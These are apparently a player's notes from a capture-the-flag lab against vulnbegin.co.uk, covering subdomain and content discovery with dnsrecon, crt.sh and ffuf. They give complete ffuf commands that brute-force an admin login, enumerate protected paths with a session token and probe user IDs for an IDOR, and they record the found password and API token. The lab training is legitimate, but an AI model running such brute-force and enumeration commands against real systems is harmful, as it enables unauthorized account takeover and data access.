- Subdomain Discovery
cmd: ``
- Using
dnsrecon
- www.vulnbegin.co.uk
- server.vulnbegin.co.uk (has a flag and says
Unauthenticated
)
- Searching on crt.sh
- v64hss83.vulnbegin.co.uk (has a flag)
- Using
- Content Discovery
- Using
ffuf
- /cpadmin/
- /js/
- /css/
- /robots.txt/
- From
/robots.txt
- /secret_d1rect0y/ (contains a flag)
- Using
- Bruteforcing
/cpadmin
usingffuf
cmd:ffuf -w ~/wordlists/usernames.txt -X POST -d "username=FUZZ&password=x" -t 1 -p 0.1 -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk -fr 'Username is invalid'
- Found
admin
valid - Bruteforced the password and found
159753
working
- Found
- Found that there is an API key and a config file somewhere in the server, so we need a 2nd round of content discovery with the token we had after logging into the admin account
cmd:
ffuf -w ~/wordlists/content.txt -t 1 -p 0.1 -H "Cookie: token=2eff535bd75e77b62c70ba1e4dcb2873; ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://www.vulnbegin.co.uk/cpadmin/FUZZ -mc all -fc 404
- Found
/env
and now investigating it. Found an API tokenX-Token: 492E64385D3779BC5F040E2B19D67742
- Recon the APIwith the token we found.
- Possible IDOR? Search the space of user IDs.
cmd:
seq 1 100 | ffuf -w - -t 1 -p 0.1 -H "X-Token: 492E64385D3779BC5F040E2B19D67742" -H "Cookie: ctfchallenge=eyJkYXRhIjoiZXlKMWMyVnlYMmhoYzJnaU9pSjRZM3A2TTNKMmR5SXNJbkJ5WlcxcGRXMGlPbVpoYkhObGZRPT0iLCJ2ZXJpZnkiOiJhYmYwNzRmYWI0Yzk2YjA3OTM4ZDcxNGQ0N2VhZWIzNSJ9" -u http://server.vulnbegin.co.uk/user/FUZZ -mc all -fc 404